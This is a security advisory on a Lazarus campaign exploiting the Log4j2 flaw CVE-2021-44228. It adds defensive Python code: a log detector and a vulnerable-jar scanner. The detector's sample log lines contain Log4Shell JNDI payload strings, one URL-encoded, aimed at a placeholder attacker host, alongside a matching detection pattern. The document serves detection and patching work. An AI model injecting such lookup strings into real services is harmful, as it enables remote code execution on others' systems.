Lazarus RAT Attack (CVE-2021-44228)

FortiGuard Security Advisory

What is the Attack?
A new attack campaign attributed to the Lazarus threat actor group has been observed using new DLang-based Remote Access Trojan (RAT) malware. The attack attempts to exploit the Apache Log4j2 vulnerability (CVE-2021-44228) for initial access. Once a host is compromised, the malware eventually establishes a command and control (C2) channel.
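Initial access through CVE-2021-44228 relies on a JNDI lookup string reaching a vulnerable Log4j2 logger, typically through an HTTP header or request path. The following is an added example, not code from the advisory or from FortiGuard, showing the kind of check a defender can run over web-access logs to surface such attempts. The log lines are constructed for the example, and the host `attacker.invalid` is a placeholder; the detector percent-decodes each line a bounded number of times before matching so that URL-encoded variants are not missed.

```python
import re
from urllib.parse import unquote

# Constructed sample web-access log lines (not from the advisory). The second
# carries a JNDI lookup string in the User-Agent, the third the same thing
# URL-encoded in the request path; the first is benign traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:00:03 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2Fattacker.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Log4j 2 lookup syntax "${jndi:<scheme>:...}" as it appears in logged input.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Source address is the first whitespace-delimited field in combined log format.
SRC_IP_PATTERN = re.compile(r"^(\S+)")


def normalize(line, rounds=3):
    """Percent-decode a bounded number of times so encoded lookups become visible."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def find_jndi_attempts(lines):
    """Return (line_number, source_ip) for every line carrying a JNDI lookup string."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if JNDI_PATTERN.search(normalize(line)):
            m = SRC_IP_PATTERN.match(line)
            hits.append((number, m.group(1) if m else "unknown"))
    return hits


if __name__ == "__main__":
    for number, src in find_jndi_attempts(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup string from {src}")
```

A hit means an exploitation attempt was logged, not that it succeeded; correlate the source with outbound LDAP/RMI connections or new child processes on the logging host to decide whether the attempt landed.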

What is the Vendor Solution?

Apache released relevant updates in 2021. CISA has provided guidance on mitigating the vulnerability.

What FortiGuard Coverage is available?

FortiGuard Labs has an IPS signature “Apache.Log4j.Error.Log.Remote.Code.Execution” (with the default action set to “block”) in place for CVE-2021-44228 and has released Antivirus signatures for the RAT malware related to the Lazarus campaign.

FortiGuard Labs recommends that companies scan their environments, identify the versions of vulnerable open-source libraries in use, develop an upgrade plan for them, and always follow best practices.
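The scanning step above is concrete enough to script. The following is an added example, not FortiGuard's or Apache's code, that walks a directory tree, identifies jars that contain log4j-core (including log4j shaded into a larger application jar), reads the version from the Maven `pom.properties` entry or the file name, and reports whether the version range and the presence of the `JndiLookup` class make the jar affected by CVE-2021-44228. The fixed versions used in the comparison (2.15.0 on the main line, 2.12.2 for the Java 7 line, 2.3.1 for the Java 6 line) are Apache's published fix versions; the jars the `demo()` function builds are constructed stand-ins with no real log4j bytes, so the example runs offline.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Class whose presence means the JNDI lookup is available. Removing it was the
# 2021 mitigation for deployments that could not upgrade immediately.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are dropped."""
    nums = [int(x) for x in re.findall(r"\d+", text.split("-")[0])][:3]
    return tuple(nums + [0] * (3 - len(nums)))


def version_is_vulnerable(version):
    """True if a log4j-core version is in the range affected by CVE-2021-44228."""
    major, minor, patch = parse_version(version)
    if major != 2:
        return False      # log4j 1.x has its own issues but is not affected by this CVE
    if minor == 3:
        return patch < 1  # Java 6 line: fixed in 2.3.1
    if minor == 12:
        return patch < 2  # Java 7 line: fixed in 2.12.2
    return minor < 15     # main line: fixed in 2.15.0


def inspect_jar(jar_path):
    """Return a finding for a jar that carries log4j-core, or None otherwise."""
    with zipfile.ZipFile(jar_path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is None:
            m = re.search(r"log4j-core-([\d.]+(?:-\w+)?)\.jar$", jar_path.name)
            if m:
                version = m.group(1)
        has_jndi = JNDI_LOOKUP_CLASS in names
        if version is None and not has_jndi:
            return None  # not log4j-core
        return {
            "path": str(jar_path),
            "version": version or "unknown",
            "has_jndi_lookup": has_jndi,
            # Affected only if the lookup class is still present AND the version is in
            # range; an unknown version with the class present is flagged conservatively.
            "vulnerable": has_jndi and (version is None or version_is_vulnerable(version)),
        }


def scan_tree(root):
    """Scan every .jar under root and return findings in path order."""
    findings = []
    for jar in sorted(Path(root).rglob("*.jar")):
        try:
            finding = inspect_jar(jar)
        except zipfile.BadZipFile:
            continue  # not a valid zip; skip rather than abort the inventory
        if finding:
            findings.append(finding)
    return findings


def _make_jar(path, version, include_jndi):
    """Build a constructed stand-in jar (metadata only, no real log4j classes)."""
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Create three constructed jars in a temp directory and scan them."""
    root = Path(tempfile.mkdtemp(prefix="log4j-scan-"))
    _make_jar(root / "app" / "log4j-core-2.12.1.jar", "2.12.1", False)  # class removed
    _make_jar(root / "lib" / "log4j-core-2.14.1.jar", "2.14.1", True)   # affected
    _make_jar(root / "lib" / "log4j-core-2.17.1.jar", "2.17.1", True)   # patched release
    return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: version {f['version']}, vulnerable={f['vulnerable']}")
```

Run `scan_tree("/opt")` or similar on a real host to build the inventory the advisory asks for; the output lists the version per jar so an upgrade plan can be prioritised, and jars where the lookup class has been removed are reported separately from jars that still need patching.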